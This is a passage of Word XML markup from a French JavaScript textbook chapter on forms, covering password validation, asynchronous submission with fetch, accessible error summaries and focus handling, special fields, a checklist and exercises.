    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le message natif est court et localisé, mais souvent trop technique. Pour un message rédigé, on utilise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>setCustomValidity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — en pensant à le remettre à zéro dès que la saisie devient valide, sinon le champ reste invalide pour toujours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une validation qui explique la correction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function validerMotDePasse(champ) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const valeur = champ.value;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  let message = "";</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  if (valeur.length === 0) message = "Le mot de passe est obligatoire.";</w:t>
        <w:br/>
        <w:t>else if (valeur.length &lt; 12) message = "Le mot de passe doit comporter 12</w:t>
        <w:br/>
        <w:t xml:space="preserve">    caractères minimum.";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  else if (!/[0-9]/.test(valeur)) message = "Ajoutez au moins un chiffre.";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  else if (!/[A-Z]/.test(valeur)) message = "Ajoutez au moins une majuscule.";</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  champ.setCustomValidity(message);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const zoneErreur = document.querySelector("#mdp-erreur");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  zoneErreur.textContent = message;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  champ.setAttribute("aria-invalid", String(Boolean(message)));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return message === "";</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>champ.addEventListener("input", () =&gt; validerMotDePasse(champ));</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LE PIÈGE DU MESSAGE PERSISTANT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Si vous appelez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>setCustomValidity("erreur")</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sans jamais repasser à une chaîne vide, le champ reste invalide même après correction. Remettez toujours la validité à zéro dans chaque branche qui ne signale pas d'erreur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le moment du message compte autant que son contenu : signaler une erreur pendant la frappe est agressif, l'afficher à la sortie du champ est pédagogique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.88 — Quatre moments de validation</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64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Moment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Comportement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Recommandation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2642"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pendant la frappe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3419"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreur à chaque caractère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2953"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À éviter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="264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À la sortie du champ (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>blur</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Vérifie et signale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Recommandé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2642"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À l'envoi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3419"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Résumé des erreurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2953"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Indispensable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="264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Après correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Efface l'erreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Obligatoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>28.3 Envoyer sans recharger la page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> envoie les données en arrière-plan. Il faut gérer quatre états : envoi en cours, succès, échec réseau, échec de validation serveur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un envoi asynchrone complet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formulaire.addEventListener("submit", async (event) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  event.preventDefault();</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  const bouton = formulaire.querySelector("button[type=submit]");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  bouton.disabled = true;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  bouton.setAttribute("aria-busy", "true");</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const reponse = await fetch("/api/contact", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      method: "POST",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      headers: { "Content-Type": "application/json" },</w:t>
        <w:br/>
        <w:t xml:space="preserve">      body: JSON.stringify(Object.fromEntries(new FormData(formulaire))),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    });</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    if (!reponse.ok) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const erreurs = await reponse.json();</w:t>
        <w:br/>
        <w:t xml:space="preserve">      afficherErreurs(erreurs);        // 422 : erreurs par champ</w:t>
        <w:br/>
        <w:t xml:space="preserve">      return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    afficherSucces("Message envoyé.");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    formulaire.reset();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } catch (erreur) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    afficherErreurGlobale("Connexion impossible. Réessayez.");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } finally {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    bouton.disabled = false;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    bouton.removeAttribute("aria-busy");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="38" name="Picture 38"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f36.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.36 — Les états d'un envoi de formulaire</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CODE 422</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Réponse HTTP signifiant que la requête est bien formée mais que les données sont invalides. Le corps contient souvent le détail des erreurs par champ.</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2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>NE JAMAIS EFFACER UN FORMULAIRE EN ÉCHEC</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un utilisateur qui a rempli dix champs et perd sa saisie à cause d'une erreur serveur ne reviendra pas. Conservez les valeurs, signalez les champs fautifs, et replacez le focus sur le premier d'entre eux.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>28.4 Erreurs et focus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Après un échec, le focus doit conduire à l'erreur. Deux stratégies : déplacer le focus sur le résumé en tête de formulaire, ou sur le premier champ invalide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un résumé d'erreurs navigable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function afficherErreurs(erreurs) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const resume = document.querySelector("#resume-erreurs");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  resume.innerHTML = "";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const liste = document.createElement("ul");</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  for (const [champ, message] of Object.entries(erreurs)) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const li = document.createElement("li");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const lien = document.createElement("a");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    lien.href = `#${champ}`;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    lien.textContent = message;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    li.append(lien);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    liste.append(li);</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    const input = document.getElementById(champ);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    input.setAttribute("aria-invalid", "true");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    input.setAttribute("aria-describedby", `${champ}-erreur`);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  resume.append(liste);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  resume.hidden = false;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  resume.focus();          // le résumé est focusable (tabindex="-1")</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le résumé est annoncé par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>role="alert"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, ses liens conduisent aux champs, et le focus y est placé : l'utilisateur au lecteur d'écran entend immédiatement ce qui bloque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>28.5 Cas particuliers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Quelques champs demandent un traitement spécifique : fichiers, champs conditionnels, cases de consentement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux cas fréquents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Aperçu d'une image avant envoi</w:t>
        <w:br/>
        <w:t>fichier.addEventListener("change", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const fichierChoisi = fichier.files[0];</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!fichierChoisi) return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (fichierChoisi.size &gt; 2 * 1024 * 1024) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    afficherErreur("L'image doit peser moins de 2 Mo.");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    fichier.value = "";</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  apercu.src = URL.createObjectURL(fichierChoisi);</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Champ conditionnel</w:t>
        <w:br/>
        <w:t>typeAbonnement.addEventListener("change", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const entreprise = typeAbonnement.value === "entreprise";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  champSociete.hidden = !entreprise;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  champSociete.required = entreprise;</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une case de consentement conforme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 Consentement explicite, jamais précoché --&gt;</w:t>
        <w:br/>
        <w:t>&lt;label for="cgv"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input id="cgv" type="checkbox" name="cgv" required&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  J'accepte les conditions générales</w:t>
        <w:br/>
        <w:t>&lt;/label&gt;</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CHECK-LIST D'UN FORMULAIRE PROFESSIONNEL</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Chaque champ a une étiquette visible et un type adapté.</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Les erreurs sont annoncées et liées aux champs.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Les données sont conservées en cas d'échec.</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 bouton indique l'état de chargement.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La validation serveur existe et renvoie des messages exploitables.</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L'API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>validity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> décrit précisément pourquoi un champ est invalide.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setCustomValidity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doit toujours être réinitialisé.</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Valider à la sortie du champ plutôt qu'à chaque frappe.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fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> impose de gérer quatre états distincts.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formulaire en échec conserve les données saisies.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résumé d'erreurs est annoncé et conduit aux champs.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validation serveur reste indispensable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le formulaire dialogue avec un serveur. Le chapitre suivant approfondit cette communication : asynchrone, promesses et API.</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28.1 — Valider un mot de passe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Écrivez une validation complète avec messages et annonce.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Contrôlez longueur, chiffre et majuscule.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Affichez un message par règle non respectée.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 xml:space="preserve">Mettez à jour </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-invalid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 28.2 — Soumettre un formulaire au serveur</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Envoyez les données en JSON et affichez le résultat.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Gérez l'état de chargement.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Traitez les codes 200 et 422.</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Prévoyez une erreur réseau.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 28.3 — Améliorer l'expérience d'erreur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ACCESSIBILITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
